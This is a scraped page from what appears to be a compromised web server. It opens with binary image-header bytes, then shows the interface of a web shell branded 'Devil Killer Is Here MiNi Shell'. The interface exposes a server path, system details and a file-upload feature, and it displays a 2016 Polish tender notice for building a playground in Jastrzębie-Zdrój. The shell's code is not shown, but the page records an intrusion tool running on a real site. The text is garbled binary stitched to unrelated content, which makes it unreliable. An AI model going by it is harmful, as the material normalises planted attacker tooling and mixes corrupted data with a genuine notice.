JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160601/63155-N-2016.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Budowa  placu zabaw przy ul. Karola Miarki w Jastrzębiu-Zdroju</b><br>
<b>Numer ogłoszenia: 63155 - 2016; data zamieszczenia: 01.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jastrzębie Zdrój - Wydział Infrastruktury Komunalnej i Inwestycji , Al. Piłsudskiego 60, 44-335 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4785302, faks 032 4785350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  placu zabaw przy ul. Karola Miarki w Jastrzębiu-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje swym zakresem zagospodarowanie części  placu zabaw zaprojektowanego na działce nr 8.6-1050/3 przy ul. K. Miarki w Jastrzębiu-Zdroju, wraz z ogrodzeniem oraz trawnikiem, a także rozmieszczenie nowych urządzeń zabawowych wraz z  wykonaniem podłoża placu zabaw w postaci  gumowych mat przerastanych trawą. Teren przewidziany do lokalizacji placu zabaw, znajduje się na terenie osiedla mieszkaniowego w Jastrzębiu-Zdroju - na terenie dotychczasowego boiska do gry. Teren znajduje się w bezpośrednim sąsiedztwie budynków mieszkalnych - wielorodzinnych,  terenów zielonych, nawierzchni utwardzonych, w postaci placów i chodników. Teren jest oświetlony lampami  ulicznymi oraz jest zabezpieczony ogrodzeniem przeziernym - siatkowym - zdekompletowanym. Przeważającą część terenu stanowi  nawierzchnia trawiasta. Teren jest wydzielony ogrodzeniem siatkowym - przeziernym, które jest w bardzo złym stanie technicznym oraz zostaje przeznaczone do całkowitego demontażu. Ponadto na terenie istniejącego boiska, znajdują się 2 słupki do montażu siatki dla gry w siatkówkę i trzepak, które są w złym stanie technicznym oraz przeznaczone są do demontażu.
Istniejąca zieleń zinwentaryzowana w granicach zakresu opracowania projektu przeznaczona jest do pozostawienia w całości (za wyjątkiem konieczności usunięcia obumarłych, chorych, suchych oraz zagrażających osobom korzystającym z placu zabaw gałęzi oraz cięcia formującego żywopłot).
Inwestycja, w zakresie urządzeń zabawowych, obejmuje część dokumentacji projektowej terenu (szczegółowy zakres wskazany w kosztorysie ślepym - załącznik nr 10) ograniczoną do:
- wykonania podłoża bezpiecznego - gumowych mat przerastanych trawą, amortyzujących upadek, obejmujących normatywne strefy bezpieczeństwa od poszczególnych urządzeń zabawowych (dostosowana do wysokości upadkowej urządzenia), Nawierzchnia  musi spełniać normę bezpieczeństwa PN-EN 1177 i posiadać certyfikat zgodności z normami na wysokość upadkową określoną dla proponowanego przez oferenta urządzenia jak również Atest PZH,
- wykonania ogrodzenia panelowego wraz z furtkami/bramą wjazdową,
- dostawy i montażu wielofunkcyjnych urządzeń rekreacyjnych, spełniających wymagane normy bezpieczeństwa - zgodnie ze szczegółowym opisem każdego z urządzeń przedstawionym w dokumentacji projektowej: huśtawka potrójna -  nr urządzenia 1-1 sztuka, huśtawka na sprężynie (bujak) - nr urządzenia - 1 sztuka, zestaw sprawnościowy - nr urządzenia 7- 1 sztuka.
Każde z montowanych urządzeń do zabawy musi spełniać normę bezpieczeństwa PN-EN 1176 Wyposażenie placu zabaw i posiadać certyfikat zgodności z normami. 
Projektowane urządzenia do zabawy, meble rekreacyjne oraz sprzęt sportowy należy zamówić wraz z gotowymi elementami fundamentowymi i kotwić zgodnie z normą PN-EN 1176-1 oraz z wymaganiami producenta. Podczas montażu wokół każdego urządzenia należy zachować wymaganą strefę bezpieczeństwa. 
Przedstawione w dokumentacji projektowej wskazania na urządzenia techniczne i materiały z podaniem producenta należy traktować jako przykładowe, ze względu na zasady wynikające z ustawy Prawo zamówień publicznych a zwłaszcza art. 29 do 31. Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji rozwiązania z zachowaniem odpowiednich równoważnych parametrów technicznych i funkcjonalnych dla osiągnięcia oczekiwanych zamierzeń będących przedmiotem projektu.
- dostawy i montażu elementów małej architektury: ławki z oparciem- 1 sztuka, kosze na śmieci z daszkiem-1 sztuka, tablica informacyjna z regulaminem placu zabaw -1 sztuka.
Szczegółowy zakres zadania został przedstawiony w dokumentacji: projekcie budowlanym i wykonawczym, SST oraz kosztorysach ślepych będących załącznikami do niniejszej specyfikacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.21.21.40-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum:
a. 2 roboty  polegające na montażu urządzeń zabawowych
b. 2 roboty  polegające na wykonaniu nawierzchni bezpiecznej z tworzyw sztucznych lub ażurowych płyt gumowych.   

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować przy wykonywanych pracach osobami posiadającymi uprawnienia nie-zbędne do wykonywania prac określonych w dokumentacji technicznej i wymagane innymi przepisami tj.: uprawnienia budowlane o specjalności konstrukcyjno-budowlanej osoby przyjmującej obowiązki kierownika budowy, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczypospolitej Polskiej wymaga się od wykonawcy, aby osoby te spełniały odpowiednie warunki opisane w art. 12 a ustawy z dnia 7 lipca 1994 Prawo Budowlane (tj. Dz. U. z 2013 r. poz. 1409 z późn. zm.)

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) karty techniczne proponowanych urządzeń określających wymiary strefy bezpiecznej,  kształt - budowę i funkcje jakie spełnia dane urządzenie lub inny dokument, z którego będą wynikały powyższe informacje, pozwalające na weryfikację pod kątem zgodności z ww. wymogami,
2) tabelaryczne zestawienie podstawowych parametrów oferowanych urządzeń - wg załącznika nr 9.
Uwaga: W przypadku rozbieżności parametrów urządzeń pomiędzy kartą techniczną, a treścią załącznika nr 9 lub braku pewnych danych w karcie technicznej Zamawiający uznaje za wiążące dane przedstawione w załączniku nr 9.
3) w przypadku strefy bezpiecznej wykraczającej poza gabaryty określone w projekcie, dla udokumentowania zachowania  warunków, o których mowa w pkt 3 siwz należy dołączyć do oferty szkic (kopię rysunku planu zagospodarowania z dokumentacji projektowej)  z naniesioną strefą bezpieczną proponowanego zestawu.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zobowiązany jest przedłożyć: 
1)	wypełniony formularz wraz z oświadczeniami zgodny w treści ze wzorem stanowiącym  załącznik nr 1.
2)	kosztorys uproszczony obejmujący wszystkie pozycje ujęte w przedmiarze robót wg załącznika nr 10. Wycena wszystkich robót winna być opracowana w formie kosztorysu uproszczonego zawierającego podstawę podanej wyceny, opis robót, jednostkę obmiarową, ilość, cenę jednostkową oraz wartość pozycji. Wersję szczegółową tego kosztorysu Wykonawca jest zobowiązany przedstawić Zamawiającemu przed podpisaniem umowy.
3)	pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z którego wynika zakres, podpisane przez osoby upraw-nione do reprezentowania Firmy (jeżeli wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie 10 siwz),
4)	pisemne zobowiązanie do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (przykładowy wzór - załącznik nr 6) - jeżeli dotyczy.
UWAGA: pełnomocnictwo i pisemne zobowiązanie powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Gwarancja - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość dokonania zmian postanowień umowy:
a) w zakresie rzeczowym przedmiotu zamówienia w przypadku zaistnienia konieczności wykonania robót zamiennych lub robót dodatkowych, które realizowane będą w oparciu o protokoły robót zamiennych/protokoły konieczności   robót dodatkowych spisane przy udziale zamawiającego i wykonawcy,
b) w zakresie terminu wykonania:
-  gdy zajdzie konieczność wykonania robót dodatkowych lub zamówienia dodatkowego nie dającego się przewidzieć na etapie sporządzania oferty i wstrzymującego wykonanie zamówienia podstawowego, co zostanie poprzedzone sporządzeniem protokołu konieczności,
-  gdy zajdzie konieczność wykonania robót zamiennych a ich realizacja uniemożliwia wykonanie zadania w   terminie określonym w § 4  umowy, co zostanie poprzedzone sporządzeniem protokołu konieczności,
-  ze względu na niekorzystne warunki atmosferyczne, mające wpływ na reżim technologiczny
W przypadku zaistnienia jednego z w/w warunków zmianie może ulec termin wykonania umowy o czas  niezbędny na uwzględnienie powyższych okoliczności.
c) w zakresie zmian wartości wynagrodzenia, o którym mowa w § 12 ust. 2 umowy w przypadku:
-  wystąpienia robót zaniechanych, zamiennych i dodatkowych,, co zostanie poprzedzone sporządzeniem protokołów konieczności. Wynagrodzenie umowne zostanie zmienione o wartość wynikającą z protokołów konieczności,
-  obowiązującej stawki VAT - zmiana może dotyczyć zarówno zwiększenia jak i zmniejszenia kosztów wykonania zamówienia,
d) w zakresie innych podmiotów, na zasobach których wykonawca się opierał wykazując spełnienie warunków udziału w postępowaniu,  a podwykonawca lub wykonawca samodzielnie wykaże spełnienie warunków w zakresie nie mniejszym niż wymagane na etapie postępowania o udzielenie zamówienia
e) w zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na     etapie realizacji zamówienia, którym wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia, 
f) w zakresie zmiany osób uprawnionych do wykonywania funkcji kierowniczych - w takim przypadku Wykonawca     zobowiązany będzie do zaproponowania osoby legitymującej się uprawnieniami spełniającymi warunki udziału w postępowaniu określone na etapie postępowania.
3. Warunkiem dokonania w/w zmian jest złożenie wniosku przez stronę inicjującą wraz z opisem i uzasadnieniem proponowanej  
    zmiany.
4. W przypadku określonym w § 22 ust. 2 pkt. f  umowy  Wykonawca zobowiązany będzie do zaproponowania osoby legitymującej się  uprawnieniami spełniającymi wymogi określone w pkt. 8.2.2 siwz, celem uzyskania akceptacji ze strony Zmawiającego.
5. Zmiana postanowień zawartej umowy dokonywana będzie w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Jastrzębie - Zdrój, Al. Piłsudskiego 60, 44-335 Jastrzębie - Zdrój, pok. B503.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2016 godzina 09:50, miejsce: Urząd Miasta Jastrzębie - Zdrój, Al. Piłsudskiego 60, 44-335 Jastrzębie - Zdrój, pok. B503.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com